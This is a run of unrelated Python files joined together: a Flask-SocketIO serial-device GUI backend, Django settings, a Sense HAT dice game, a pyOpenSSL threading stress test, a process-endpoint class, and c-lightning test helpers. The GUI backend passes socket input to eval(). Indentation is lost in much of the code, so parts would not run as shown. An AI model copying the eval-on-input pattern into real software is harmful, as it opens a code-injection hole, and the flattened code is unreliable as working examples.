socketio.emit('state toggle', system_parameters[poi][0], broadcast=True) #tell the GUI that the desired has changed
except:
print('failed toggle socket')
print ("Stopping serial read. Returning to idle state")
time.sleep(0.01)
def strip_until_marker(input_string):
#return only text after last non-ascii character has been found
#should *always* work...closing byte of plot package is \xff which is non-ascii and
#should get caught in this scheme...there are of course ways to break this but they
#require breaking the communication contract we have setup.
new_string = ''
for x in range(len(input_string)):
poss = input_string[x:x+1]
try:
if version3:
if type(poss)==type("hi"):
poss = str.encode(poss,'ascii') #fail here possibly
char = poss.decode('ascii')
new_string+=char
except:
new_string=""
return new_string
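#Example (sketch, hypothetical input): strip_until_marker(b'\x07\x12\xff&S~Kp~P&') returns
#'&S~Kp~P&', since everything up to and including the last non-ascii byte (0xff) is dropped.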
#runtime variables...
def messageRead(buff,exp):
first = struct.unpack('b',buff[0:1])[0]
last = struct.unpack('b',buff[exp-1:exp])[0]
if first == 0 and last == -1:
return True
else:
return False
# if not version3:
# newb = buff
# buff = [ord(q) for q in newb] #converts yucky binary/string abominations of python 2.* into list of ascii numbers essentially...not issue in 3
# mcuMessage=list(range(expected))
# if buff[0] == 0 and buff[expected-1] == 255: #likely correct message
# errorF = False
# mcuMessage[0] = buff[0]
# mcuMessage[expected-1] = buff[expected-1]
# for i in range(1,expected-1):
# bufI = buff[i]
# if bufI ==0 or bufI == 255:
# errorF = True;
# mcuMessage[i] = bufI
# if not errorF:
# return mcuMessage
# return None
@app.route('/')
def index():
global thread
print ("A user connected")
if thread is None:
thread = Thread(target=serialThread)
thread.daemon = True
thread.start()
return render_template('index.html')
@socketio.on('connect')
def test_connect():
print ('hey someone connected')
ports = serial_ports() #generate list of currently connected serial ports
print (ports)
newb=[]
for p in ports:
newb.append({"comName": p})
print (json.dumps(newb))
#emit('serial list display', {'data': ports}) #emit socket with serial ports in it
emit('serial list display', newb) #emit socket with serial ports in it
#emit('my response', {'data': 'Connected'})
@socketio.on('disconnect')
def test_disconnect():
global csv_yn
global csvLock
emit('serial disconnect request',broadcast=True)
csv_yn = 0
#if current is not None and archive is not None:
csvLock.acquire()
try:
current.close()
archive.close()
except NameError:
pass #if didn't exist yet, don't try...
csvLock.release()
print('Client disconnected. Hopefully that was for the best.')
writeUpdates('~',0)#for non-autoreset devices must tell it to enter child state again
def writeUpdates(tag,val):
global serialPort
global serialLock
string_to_write = tag+' %0.2f\n' %(float(val))
print(string_to_write)
if serialConnected:
serialLock.acquire() #claim serial resource
if version3:
b = bytes(string_to_write,'UTF-8')
print(b)
serialPort.write(bytes(string_to_write,'UTF-8'))
else:
serialPort.write(string_to_write.encode('utf-8'))
#serialPort.write(string_to_write)
serialLock.release() #release serial resource back out into big scary world
else:
print ("Change in %s to value %s not written since no live serial comm exists yet" %(tag,val))
# Specs
@socketio.on('serial select')
def action(port):
global serialselection
print ('serial port changed to %s' %(port))
serialselection = port
@socketio.on('baud select')
def action(baud):
global baudselection
print ('baud changed to %s' %(baud))
baudselection = baud
@socketio.on('csv state')
def csver(csv_val):
global csv_default
global csv_recent
global current
global archive
global csv_yn
global csvLock
global csv_st
if int(csv_val) == 0:
print('closing csv files')
csv_yn = 0
csvLock.acquire()
try:
current.close()
archive.close()
except NameError:
pass #did not exist yet...totes fine
csvLock.release()
else: #do other thing
print('Trying opening csv files up!')
csv_st = time.time()
#current = open('./csv_files/current.csv',"w",encoding='utf8',newline='')
#archive = open('./csv_files/'+str(int(time.time()))+'.csv',"w",encoding='utf8',newline='')
try:
current = open('./csv_files/current.csv',"w",**kwargs)
archive = open('./csv_files/'+str(int(time.time()))+'.csv',"w",**kwargs)
csv_default = csv.writer(archive)
csv_recent = csv.writer(current)
csvLock.acquire()
csv_default.writerow(['Time']+params_and_values)
csv_recent.writerow(['Time']+params_and_values)
csvLock.release()
csv_yn = 1
print ('CSV File Open successful')
except:
print("Failed to open CSV Files")
@socketio.on('serial connect request')
def connection(already_built):
global serialConnected
global serialPort
global serialLock
global alternate
global isSetup
already_built = eval(str(already_built))
print("state of gui")
print(already_built)
    isSetup = already_built['state'] #use this
print(isSetup)
alternate = 0
print ('Trying to connect to: ' + serialselection + ' ' + str(baudselection))
print (serialLock)
print (serialConnected)
try:
serialLock.acquire()
print ("Lock acquired")
serialPort = serial.Serial(serialselection, int(baudselection),timeout=4)
print ('SerialPort')
print ('Connected to ' + str(serialselection) + ' at ' + str(baudselection) + ' BAUD.')
emit('serial connected', broadcast=True) #tells page to indicate connection (in button)
serialPort.flushInput()
#serialPort.flushOutput()
serialLock.release()
serialConnected = True #set global flag
except:
print ("Failed to connect with "+str(serialselection) + ' at ' + str(baudselection) + ' BAUD.')
@socketio.on('serial disconnect request')
def discon():
global serialConnected
global serialLock
global serialPort
print ('Trying to disconnect...')
serialLock.acquire()
serialPort.close()
serialLock.release()
serialConnected = False
emit('serial disconnected',broadcast=True)
print ('Disconnected...good riddance' )
@socketio.on("disconnected")
def ending_it():
print ("We're done")
@socketio.on('change')
def action(data):
global system_parameters
data = eval(str(data))
system_parameters[data['id']][0]=float(data['val'])
writeUpdates(system_parameters[data['id']][1],system_parameters[data['id']][0])
@socketio.on('all set from gui')
def action():
global allGoodFromGUI
allGoodFromGUI = True
print("we are done from GUI Side")
inform_dev()
def inform_dev():
global serialPort
global serialLock
string_to_write = "SET\n"
if serialConnected:
serialLock.acquire() #claim serial resource
if version3:
serialPort.write(bytes(string_to_write,'UTF-8'))
else:
print(string_to_write)
serialPort.write(string_to_write)
serialPort.flushInput()
serialLock.release() #release serial resource back out into big scary world
else:
print ("can't inform device since it isn't connected...what does this even mean")
@socketio.on('alternate state')
def action(alt):
alt = int(alt)
global alternate
global alt_data
if alt == 1:
print ('%s changed to alternating at +/- %0.2f ' %(alt_data['param'],float(system_parameters[alt_data['param']][0])))
alt_data['timer'] = time.time()
alt_data['state'] = 1.0
alternate = 1
else:
print ('%s changed to fixed at %0.2f' %(alt_data['param'],float(system_parameters[alt_data['param']][0])))
alternate = 0
if __name__ == '__main__':
socketio.run(app, port=3000, debug=True)
|
settings_20210906111039.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# schedule.every().day.at("11:00").do(decrease_day_count_and_send_bday_mails)
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON STARTS////////////////////
# Schedule the task at 00:01 everyday
schedule.every().day.at("11:11").do(decrease_day_count_and_send_bday_mails)
# schedule.every().day.at("01:00").do(delete_task_and_add_store_datewise)
def func():
while True:
print("======Runnning==========")
schedule.run_pending()
time.sleep(1)
t1 = threading.Thread(target=func)
t1.start()
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS////////////////////
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path=os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY =os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
fun.py
|
from sense_hat import SenseHat
from time import sleep
from random import randint
import sys
from subprocess import Popen
import threading
sense = SenseHat()
default_rotation = 0
menu = ['4','6','8', '10','12','20']
angles = [180, 270, 0, 90, 180, 270, 0, 90, 180]
current_position = 1
def arrB(turn = True):
r = (255,0,0)
w = (0,0,0)
bl = (0,51,102)
br = (153,102,51)
sl = (102,102,153)
y = (255,177,0)
image = [
w,w,y,y,w,w,w,w,
w,w,bl,w,y,w,w,w,
w,w,bl,w,w,y,sl,w,
br,br,br,br,br,y,br,sl,
w,w,bl,w,w,y,sl,w,
w,w,bl,w,y,w,w,w,
w,w,y,y,w,w,w,w,
w,w,w,w,w,w,w,w
]
sense.set_pixels(image)
if turn:
for r in angles:
sense.set_rotation(r)
sleep(0.1)
def dragon(turn = True):
r = (255,0,0)
w = (0,0,0)
s = (105,105,105)
    yellow = (255,177,0)
image = [
w,w,w,s,r,r,r,r,
w,w,w,s,r,w,r,r,
w,w,w,s,r,r,r,r,
w,s,s,s,r,w,w,w,
r,r,r,r,r,r,r,w,
w,r,r,r,r,w,w,w,
w,r,r,r,r,w,w,w,
w,w,r,w,r,w,w,w
]
sense.set_pixels(image)
if turn:
for r in angles:
sense.set_rotation(r)
sleep(0.1)
def happyFace(turn = True):
sense.set_pixel(2, 2, (0, 0, 255))
sense.set_pixel(4, 2, (0, 0, 255))
sense.set_pixel(3, 4, (105, 105, 105))
sense.set_pixel(1, 5, (255, 0, 0))
sense.set_pixel(2, 6, (255, 0, 0))
sense.set_pixel(3, 6, (255, 0, 0))
sense.set_pixel(4, 6, (255, 0, 0))
sense.set_pixel(5, 5, (255, 0, 0))
if turn:
for r in angles:
sense.set_rotation(r)
sleep(0.1)
def rollDice(message, printDice = True, extra = None):
    # Map dice names (with or without a leading 'd') to their number of sides.
    dice_sides = {'d20': 20, '20': 20, 'd12': 12, '12': 12, 'd10': 10, '10': 10,
                  'd8': 8, '8': 8, 'd6': 6, '6': 6, 'd4': 4, '4': 4}
    message_arr = message.split(' ')
    message = message_arr[0]
    sec_roll = None
    sides = dice_sides.get(message)
    roll = randint(1, sides) if sides else 'Error'
    # Handling disadvantage and advantage rolls: roll a second die of the same
    # size and keep the lower ('di') or higher ('ad') of the two results.
    if sides and extra == 'di': # roll in disadvantage
        print('first roll: ' + str(roll))
        sec_roll = randint(1, sides)
        if sec_roll < roll:
            roll = sec_roll
    elif sides and extra == 'ad': # roll in advantage
        print('first roll: ' + str(roll))
        sec_roll = randint(1, sides)
        if sec_roll > roll:
            roll = sec_roll
    if sec_roll:
        print('sec roll:' + str(sec_roll))
    if printDice:
        print('roll: ' + str(roll))
    return str(roll)
def inputMessage(e,message = None,process = None):
try:
if not message:
message = input('Type of dice (type "q" to quit):')
if message == 'q':
if process:
process.kill()
sense.show_message('')
e.set()
raise ValueError('Program Exit')
elif 'di' in message:
arrB()
roll = rollDice(message, True, 'di')
process = Popen(['python3', './fun1.py', roll])
message = input('Type of dice (type "q" to quit):')
process.kill()
sense.show_message('')
happyFace(False)
inputMessage(e, message, process)
elif 'ad' in message:
arrB()
roll = rollDice(message, True, 'ad')
process = Popen(['python3', './fun1.py', roll])
message = input('Type of dice (type "q" to quit):')
process.kill()
sense.show_message('')
happyFace(False)
inputMessage(e, message, process)
else:
arrB()
roll = rollDice(message)
process = Popen(['python3', './fun1.py', roll])
message = input('Type of dice (type "q" to quit):')
process.kill()
sense.show_message('')
happyFace(False)
inputMessage(e, message, process)
except ValueError as err:
print(err)
except KeyboardInterrupt:
print('exception')
        inputMessage(e)
def joystick(e):
global current_position
sense.set_rotation(default_rotation)
idle = False
while not e.isSet():
event = sense.stick.wait_for_event()
if event.direction == 'up' and (event.action == 'pressed' or event.action == 'held'):
idle = False
if current_position < len(menu):
current_position += 1
sense.set_rotation(0)
sense.show_message(menu[current_position-1], 0.05, text_colour=(200,200,200))
elif event.direction == 'down' and (event.action == 'pressed' or event.action == 'held'):
idle = False
if current_position > 1:
current_position -= 1
sense.set_rotation(0)
sense.show_message(menu[current_position-1], 0.05, text_colour=(200,200,200))
elif event.direction == 'middle' and event.action == 'held':
idle = True
sense.show_letter(' ')
if not idle:
happyFace(False)
def movementDetec(e):
x = round(sense.get_accelerometer_raw()['x'], 2)
y = round(sense.get_accelerometer_raw()['y'], 2)
z = round(sense.get_accelerometer_raw()['z'], 2)
threshold = 0.80
while not e.isSet():
acceleration = sense.get_accelerometer_raw()
x_tmp = round(acceleration['x'],2)
y_tmp = round(acceleration['y'],2)
z_tmp = round(acceleration['z'],2)
if abs(x_tmp - x) > threshold or abs(y_tmp - y) > threshold or abs(z_tmp - z) > threshold:
roll = rollDice(menu[current_position-1],False)
arrB()
for i in range(3):
sense.show_message(roll, 0.08,text_colour=(200,200,200))
happyFace(False)
sleep(3)
x = x_tmp
y = y_tmp
z = z_tmp
if __name__ == '__main__':
arrB(False)
#happyFace(False)
threads = []
e = threading.Event()
t1 = threading.Thread(target=inputMessage, args=(e,))
threads.append(t1)
t2 = threading.Thread(target=joystick, args=(e,))
threads.append(t2)
t3 = threading.Thread(target=movementDetec, args=(e,))
threads.append(t3)
for i in threads:
i.start()
for i in threads:
i.join()
sense.show_letter(' ')
|
thread-key-gen.py
|
# Copyright (C) Jean-Paul Calderone
# See LICENSE for details.
#
# Stress tester for thread-related bugs in RSA and DSA key generation. 0.12 and
# older held the GIL during these operations. Subsequent versions release it
# during them.
from threading import Thread
from OpenSSL.crypto import TYPE_RSA, TYPE_DSA, PKey
def generate_rsa():
keys = []
for i in range(100):
key = PKey()
key.generate_key(TYPE_RSA, 1024)
keys.append(key)
def generate_dsa():
keys = []
for i in range(100):
key = PKey()
key.generate_key(TYPE_DSA, 512)
keys.append(key)
def main():
threads = []
for i in range(3):
t = Thread(target=generate_rsa, args=())
threads.append(t)
t = Thread(target=generate_dsa, args=())
threads.append(t)
for t in threads:
t.start()
main()
|
proc_endpoint.py
|
""" SNR framework for scheduling and task management
Node: Task queue driven host for data and endpoints
AsyncEndpoint: Generate and process data for Nodes
Relay: Server data to other nodes
"""
import signal
from time import time
from typing import Callable
from multiprocessing import Process
from snr.endpoint import Endpoint
from snr.node import Node
from snr.utils.utils import sleep
from snr.profiler import Timer
class ProcEndpoint(Endpoint):
"""An Asynchronous endpoint of data for a node
    A ProcEndpoint is part of a node, and runs in its own process. An
    endpoint may produce data to be stored in the Node or retrieve data from
the Node. The endpoint has its loop handler function run according to its
tick_rate (Hz).
"""
def __init__(self, parent: Node, name: str,
setup_handler: Callable, loop_handler: Callable,
tick_rate_hz: float):
super().__init__(parent, name)
self.setup = setup_handler
self.loop_handler = loop_handler
self.terminate_flag = False
self.set_delay(tick_rate_hz)
if parent:
self.profiler = parent.profiler
else:
self.profiler = None
def set_delay(self, tick_rate_hz: float):
if tick_rate_hz == 0:
self.delay = 0.0
else:
self.delay = 1.0 / tick_rate_hz
def start_loop(self):
self.dbg("framework", "Starting proc endpoint {} process", [self.name])
self.proc = self.get_proc()
self.proc.start()
def get_proc(self):
return Process(target=self.threaded_method, daemon=True)
def join(self):
self.set_terminate_flag()
self.proc.join()
def threaded_method(self):
# signal.signal(signal.SIGINT, signal.SIG_IGN)
try:
self.setup()
while not self.terminate_flag:
if self.profiler is None:
self.loop_handler()
else:
self.profiler.time(self.name, self.loop_handler)
# self.dbg("profiling_endpoint",
# "Ran {} task in {:6.3f} us",
# [self.name, runtime * 1000000])
self.tick()
except (Exception, KeyboardInterrupt) as e:
self.dbg("proc_endpoint_error", "{}, e: {}", [self.name, e])
self.set_terminate_flag()
self.dbg("framework", "Proc endpoint {} exited loop", [self.name])
self.terminate()
return
def get_name(self):
return self.name
def tick(self):
if (self.delay == 0.0):
self.dbg("framework_warning",
"proc_endpoint {} does not sleep (max tick rate)",
[self.name])
else:
sleep(self.delay)
def set_terminate_flag(self):
self.terminate_flag = True
self.dbg("framework", "Terminating proc_endpoint {}", [self.name])
def terminate(self):
raise NotImplementedError
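# Hypothetical usage sketch (the names `node`, `setup_imu` and `poll_imu` are illustrative,
# not part of this module): a 10 Hz endpoint would be driven roughly like
#   ep = ProcEndpoint(node, "imu_poller", setup_imu, poll_imu, tick_rate_hz=10.0)
#   ep.start_loop()   # spawns the daemon Process running threaded_method()
#   ep.join()         # sets terminate_flag and waits for the process to exit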
|
utils.py
|
from bitcoin.core import COIN # type: ignore
from bitcoin.rpc import RawProxy as BitcoinProxy # type: ignore
from bitcoin.rpc import JSONRPCError
from contextlib import contextmanager
from pathlib import Path
from pyln.client import RpcError
from pyln.testing.btcproxy import BitcoinRpcProxy
from collections import OrderedDict
from decimal import Decimal
from ephemeral_port_reserve import reserve # type: ignore
from pyln.client import LightningRpc
from pyln.client import Millisatoshi
import json
import logging
import lzma
import math
import os
import psutil # type: ignore
import random
import re
import shutil
import sqlite3
import string
import struct
import subprocess
import sys
import threading
import time
import warnings
BITCOIND_CONFIG = {
"regtest": 1,
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
"fallbackfee": Decimal(1000) / COIN,
}
LIGHTNINGD_CONFIG = OrderedDict({
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"watchtime-blocks": 5,
"rescan": 1,
'disable-dns': None,
})
FUNDAMOUNT = 10**6
def env(name, default=None):
"""Access to environment variables
Allows access to environment variables, falling back to config.vars (part
of c-lightning's `./configure` output), and finally falling back to a
default value.
"""
fname = 'config.vars'
if os.path.exists(fname):
lines = open(fname, 'r').readlines()
config = dict([(line.rstrip().split('=', 1)) for line in lines])
else:
config = {}
if name in os.environ:
return os.environ[name]
elif name in config:
return config[name]
else:
return default
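# For example (sketch): TEST_NETWORK below resolves from $TEST_NETWORK first, then from a
# TEST_NETWORK=... line in config.vars if that file exists, and otherwise falls back to
# 'regtest'.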
VALGRIND = env("VALGRIND") == "1"
TEST_NETWORK = env("TEST_NETWORK", 'regtest')
DEVELOPER = env("DEVELOPER", "0") == "1"
TEST_DEBUG = env("TEST_DEBUG", "0") == "1"
SLOW_MACHINE = env("SLOW_MACHINE", "0") == "1"
DEPRECATED_APIS = env("DEPRECATED_APIS", "0") == "1"
TIMEOUT = int(env("TIMEOUT", 180 if SLOW_MACHINE else 60))
def wait_for(success, timeout=TIMEOUT):
start_time = time.time()
interval = 0.25
while not success():
time_left = start_time + timeout - time.time()
if time_left <= 0:
raise ValueError("Timeout while waiting for {}", success)
time.sleep(min(interval, time_left))
interval *= 2
if interval > 5:
interval = 5
def write_config(filename, opts, regtest_opts=None, section_name='regtest'):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
if regtest_opts:
f.write("[{}]\n".format(section_name))
for k, v in regtest_opts.items():
f.write("{}={}\n".format(k, v))
def only_one(arr):
"""Many JSON RPC calls return an array; often we only expect a single entry
"""
assert len(arr) == 1
return arr[0]
def sync_blockheight(bitcoind, nodes):
height = bitcoind.rpc.getblockchaininfo()['blocks']
for n in nodes:
wait_for(lambda: n.rpc.getinfo()['blockheight'] == height)
def wait_channel_quiescent(n1, n2):
wait_for(lambda: only_one(only_one(n1.rpc.listpeers(n2.info['id'])['peers'])['channels'])['htlcs'] == [])
wait_for(lambda: only_one(only_one(n2.rpc.listpeers(n1.info['id'])['peers'])['channels'])['htlcs'] == [])
def get_tx_p2wsh_outnum(bitcoind, tx, amount):
"""Get output number of this tx which is p2wsh of amount"""
decoded = bitcoind.rpc.decoderawtransaction(tx, True)
for out in decoded['vout']:
if out['scriptPubKey']['type'] == 'witness_v0_scripthash':
if out['value'] == Decimal(amount) / 10**8:
return out['n']
return None
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None, verbose=True):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.env = os.environ.copy()
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
self.err_logs = []
self.prefix = ""
# Should we be logging lines we read from stdout?
self.verbose = verbose
# A filter function that'll tell us whether to filter out the line (not
# pass it to the log matcher and not print it to stdout).
self.log_filter = lambda line: False
def start(self, stdin=None, stdout=None, stderr=None):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line,
stdin=stdin,
stdout=stdout if stdout else subprocess.PIPE,
stderr=stderr,
env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
rc = self.proc.wait(timeout)
if rc is None:
self.proc.kill()
self.proc.wait()
self.thread.join()
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
line = line.decode('UTF-8', 'replace').rstrip()
if self.log_filter(line):
continue
if self.verbose:
sys.stdout.write("{}: {}\n".format(self.prefix, line))
with self.logs_cond:
self.logs.append(line)
self.logs_cond.notifyAll()
self.running = False
self.proc.stdout.close()
if self.proc.stderr:
for line in iter(self.proc.stderr.readline, ''):
if line is None or len(line) == 0:
break
line = line.rstrip().decode('UTF-8', 'replace')
self.err_logs.append(line)
self.proc.stderr.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def is_in_stderr(self, regex):
"""Look for `regex` in stderr."""
ex = re.compile(regex)
for l in self.err_logs:
if ex.search(l):
logging.debug("Found '%s' in stderr", regex)
return l
logging.debug("Did not find '%s' in stderr", regex)
return None
def wait_for_logs(self, regexs, timeout=TIMEOUT):
"""Look for `regexs` in the logs.
We tail the stdout of the process and look for each regex in `regexs`,
starting from last of the previous waited-for log entries (if any). We
fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
elif not self.running:
raise ValueError('Process died while waiting for logs')
with self.logs_cond:
if pos >= len(self.logs):
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=TIMEOUT):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
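# Sketch of how the subclasses below use TailableProc (see BitcoinD and LightningD): they fill
# in self.cmd_line (and optionally self.prefix / self.env), call start() to launch and tail
# the process, then synchronize on its output, e.g.
#   proc.start()
#   proc.wait_for_log("Done loading", timeout=TIMEOUT)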
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
throwaway connections. This is easier than to reach into the RPC
library to close, reopen and reauth upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
def f(*args):
logging.debug("Calling {name} with arguments {args}".format(
name=name,
args=args
))
res = proxy._call(name, *args)
logging.debug("Result for {name} call: {res}".format(
name=name,
res=res,
))
return res
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
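# Usage sketch (`conf` standing in for a path to a bitcoin.conf): every attribute access
# builds a one-shot callable, so
#   SimpleBitcoinProxy(btc_conf_file=conf).getblockcount()
# opens a throwaway connection, issues the RPC and logs both the call and its result.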
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'bitcoind'
regtestdir = os.path.join(bitcoin_dir, 'regtest')
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
'bitcoind',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-txindex',
'-nowallet',
'-addresstype=bech32'
]
# For up to and including 0.16.1, this needs to be in main section.
BITCOIND_CONFIG['rpcport'] = rpcport
# For after 0.16.1 (eg. 3f398d7a17f136cd4a67998406ca41a124ae2966), this
# needs its own [regtest] section.
BITCOIND_REGTEST = {'rpcport': rpcport}
self.conf_file = os.path.join(bitcoin_dir, 'bitcoin.conf')
write_config(self.conf_file, BITCOIND_CONFIG, BITCOIND_REGTEST)
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.proxies = []
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
try:
self.rpc.createwallet("lightningd-tests")
except JSONRPCError:
self.rpc.loadwallet("lightningd-tests")
def stop(self):
for p in self.proxies:
p.stop()
self.rpc.stop()
return TailableProc.stop(self)
def get_proxy(self):
proxy = BitcoinRpcProxy(self)
self.proxies.append(proxy)
proxy.start()
return proxy
# wait_for_mempool can be used to wait for the mempool before generating blocks:
    # True := wait for at least 1 transaction
# int > 0 := wait for at least N transactions
# 'tx_id' := wait for one transaction id given as a string
# ['tx_id1', 'tx_id2'] := wait until all of the specified transaction IDs
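    # A minimal sketch of the accepted forms (the txid string is hypothetical):
    #   bitcoind.generate_block(1, wait_for_mempool=True)           # at least one tx
    #   bitcoind.generate_block(6, wait_for_mempool=2)              # at least two txs
    #   bitcoind.generate_block(1, wait_for_mempool='f00dface...')  # that specific txid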
def generate_block(self, numblocks=1, wait_for_mempool=0):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(lambda: all(txid in self.rpc.getrawmempool() for txid in wait_for_mempool))
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
mempool = self.rpc.getrawmempool()
logging.debug("Generating {numblocks}, confirming {lenmempool} transactions: {mempool}".format(
numblocks=numblocks,
mempool=mempool,
lenmempool=len(mempool),
))
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generatetoaddress(numblocks, self.rpc.getnewaddress())
def simple_reorg(self, height, shift=0):
"""
Reorganize chain by creating a fork at height=[height] and re-mine all mempool
transactions into [height + shift], where shift >= 0. Returns hashes of generated
blocks.
Note that tx's that become invalid at [height] (because coin maturity, locktime
etc.) are removed from mempool. The length of the new chain will be original + 1
OR original + [shift], whichever is larger.
For example: to push tx's backward from height h1 to h2 < h1, use [height]=h2.
Or to change the txindex of tx's at height h1:
1. A block at height h2 < h1 should contain a non-coinbase tx that can be pulled
forward to h1.
2. Set [height]=h2 and [shift]= h1-h2
"""
hashes = []
fee_delta = 1000000
orig_len = self.rpc.getblockcount()
old_hash = self.rpc.getblockhash(height)
final_len = height + shift if height + shift > orig_len else 1 + orig_len
# TODO: raise error for insane args?
self.rpc.invalidateblock(old_hash)
self.wait_for_log(r'InvalidChainFound: invalid block=.* height={}'.format(height))
memp = self.rpc.getrawmempool()
if shift == 0:
hashes += self.generate_block(1 + final_len - height)
else:
for txid in memp:
